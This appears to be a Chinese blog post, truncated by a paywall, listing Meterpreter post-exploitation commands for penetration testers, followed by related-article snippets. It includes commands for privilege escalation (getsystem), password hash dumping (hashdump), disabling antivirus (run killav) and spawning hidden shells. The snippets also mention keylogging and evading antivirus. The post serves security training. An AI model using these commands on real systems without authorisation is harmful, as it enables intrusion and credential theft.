12、后渗透测试--meterpreter使用

最新推荐文章于 2025-06-23 18:30:00 发布
原创 最新推荐文章于 2025-06-23 18:30:00 发布 · 1.8k 阅读 · 32 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#metasploit #meterpreter

本文介绍了Meterpreter在后渗透阶段的各种实用命令和技术,包括系统管理、文件操作、进程管理、网络配置、信息搜集等方面,帮助渗透测试人员更高效地完成任务。
Post后渗透模块
在meterpreter > 中我们可以使用以下的命令来实现对目标的操作。
 

一、基本系统命令

sessions    # sessions –h 查看帮助
sessions -i <ID值>  # 进入会话   -k  杀死会话
background  # 将当前会话放置后台
info   # 查看已有模块信息
getuid   查看获取的当前权限
getsystem           提权
getpid    # 获取当前进程的pid
sysinfo   # 查看目标机系统信息
ps          # 查看当前活跃进程    kill <PID值> 杀死进程
idletime            查看目标机运行时间
 
hashdump     # 从SAM数据库导出密码的哈希
 
reboot / shutdown   # 重启/关机
shell     # 进入目标机cmd shell
load kiwi           加载wiki模块
run                   使用扩展库,执行已有的模块,输入run后按两下tab,列出已有的脚本
run  killav         关闭杀毒软件
 
run scraper         查看目标主机详细信息

 二、execute执行文件

execute  参数  -f 可执行文件   执行可执行程序
execute -H -i -f cmd.exe    # 创建新进程cmd.exe,-H不可见,-i交互
 

三、目录/文件操作

pwd / getwd   
最低0.47元/天 解锁文章
【内网安全】——meterpreter使用攻略
Demo不是emo的博客
02-01 6261
meterpreter使用攻略(持续更新中)
meterpreter使用教程
u011250160的博客
04-26 1872
Core Commands ============= Command Description ------- ----------- ? 在meterpreter下输入?和help是一样的就是显示所有的参数 background background和bg是一样的,后台运行shell,也相当于ctrl+z进入后台运行
meterpreter使用
weixin_30405421的博客
09-26 1646
0x01 系统命令 基本系统命令 1 background # 将当前会话放置后台 2 sessions # sessions –h 查看帮助 3 sessions -i <ID值> #进入会话 -k 杀死会话 4 bgrun / run # 执行已有的模块,输入run后按两下tab,列出已有的脚本 5 info # 查看已有...
meterpreter
weixin_33817333的博客
03-12 196
用过metasploit的人应该对meterpreter不陌生,它具有强大的功能,特别是其socks代理,简直就是内网渗透测试神器。由于meterpreter功能强大,萌生了想要把msf做远控的念头。另外,围绕meterpreter一个重要的问题,就是如何绕过杀软。 这促使我决定一窥meterpreter的究竟,以了解其工作原理和流程,从而方便自定义载荷进行免杀,或者予以改造做远控。后来发现,直...
精选资源
E026-渗透测试常用工具-使用meterpreter模块进行后渗透测试.pdf
12-02
本课程主要讲解如何使用Meterpreter模块进行后渗透测试。 首先,了解MeterpreterMeterpreter是一种动态的、交互式的远程控制工具,它是Metasploit框架的一部分。它可以在多种操作系统上运行,包括Windows、Linux...
精选资源
79-79.渗透测试-meterpreter介绍.mp4
05-10
79-79.渗透测试-meterpreter介绍.mp4
渗透测试-[Meterpreter后渗透25招]
m0_43405474的博客
05-07 3587
渗透测试-[后渗透25招]0.实验环境1.MS08-067漏洞描述【RPC】2.主机发现3 利用MSF通过ms08-067漏洞渗透目标系统4.后渗透利用4.1.系统信息搜集(1)获取系统基本信息(2)判断目标系统是否为虚拟机(3)磁盘分区情况(4)目标软件安装情况(5)其他信息搜集4.2查看权限4.3 进入目标系统Shell4.4 添加账号4.5 将新账号添加到管理员组中4.6 截屏4.7 文件上传4.8 下载文件4.9 获取口令hash4.10 摄像头4.11 键盘监听(1) ps找到合适的进程进行迁移(
渗透测试-后渗透阶段.pdf
02-25
后渗透阶段是在渗透测试中,获取到目标系统控制权之后进行的操作,这个阶段的主要目的是为了获得更多的信息,并且保持对目标系统的控制。这个阶段的操作主要包括但不限于信息的收集、权限的提升、维持对系统的控制、...
meterpreter常用命令
m0_52421380的博客
08-12 3944
MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。Meterpreter功能强大,支持信息收集、提权、注册表操作、哈希利用、截屏录屏等操作,也支持对摄像头、录音设备、键盘鼠标的控制。可以使用meterpreter自带的功能实现控制对方手机和电脑。nc,全称为NetworkConnection,是一种网络连接的工具,可以用来在两台计算机之间建立网络连接。
渗透测试常用工具-使用meterpreter模块进行后渗透测试
我是网络安全兼技能大赛工程师,专注网络安全技术学习与技能大赛实战!持续分享最新的技术文章,帮你少走弯路,一起在技术赛道上进步~
10-24 1740
再然后使用命令keyscan_start对键盘进行监听,使用命令keyscan_dump保存截获的键盘信息(注:windows会话窗口的概念,windows桌面划分为不同的会话(session),以便于与windows交互。第五步,使用info windows/meterpreter/reverse_tcp命令来查看攻击载荷模块的具体信息,该模块适用于Windows x86平台不需要admin权限便可以运行,大小为281字节,需要配置三个参数分别为退出的方式、监听的地址、监听的端口号、EXITFUNC。
Meterpreter 简述
weixin_34277853的博客
09-30 381
Metasploit是Windows系统下的ShellCode—meterpreterMetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。exploit是指“漏洞及其利用”,其利用一切可以利用的工具、采取一切可以采取的方法、找到一切可...
Meterpreter 简单入门
最新发布
ailx10
06-23 1067
本文简要介绍了Meterpreter渗透测试工具的基本使用方法,包括控制端配置、载荷生成与投递、核心命令操作等内容。文章详细列举了Meterpreter在文件操作、网络监控、系统控制、用户界面交互、摄像头操作等方面的常用命令,如上传下载文件、获取系统信息、键盘记录、屏幕截图等。同时还介绍了权限提升、密码数据库导出等高级功能。这些命令可以帮助安全人员快速了解Meterpreter的强大功能,适用于网络安全入门学习和渗透测试实践。
三、Meterpreter
qq_59235193的博客
02-02 624
Meterpreter通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。MeterpreterMetasploit框架的一个扩展模块,可以调用Metasploit的一些功能,对目标系统进行更深入的渗透,这些功能包括反追踪、纯内存工作模式、密码哈希值获取、特权提升、跳板攻击等。
Meterpreter命令详解
weixin_43803070的博客
07-10 1623
文章讲的比较浅显易懂,比较深奥的东西我就不写了。 0x01初识Meterpreter 1.1.什么是Meterpreter MeterpreterMetasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块...
渗透测试——Meterpreter
YT的博客
02-18 2252
Meterpreter 优点: 平台通用性:Meterpreter 提供了基于 JAVA 和 PHP 语言的实现,以应用在各种不同的环境中 纯内存工作模式:执行漏洞渗透攻击的时候,会直接装载 Meterpreter 的动态链接库到目标进程空间中,而不是先将 Meterpreter 上传到磁盘然后再调用 Loadlibrary 加载动态链接库来启动 Meterpreter。这里便会有一个技术...
metepreter命令
sunshine19871211的博客
04-14 1120
https://xz.aliyun.com/t/2536 meterpreter后渗透命令 background 将会话切换到后台 sessions -l sessions -i 2 启动一个shell或一个meterpreter sessions -k 2 杀死shell upload /root/桌面/payload.txt c: edit payload.txt cat ls c: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值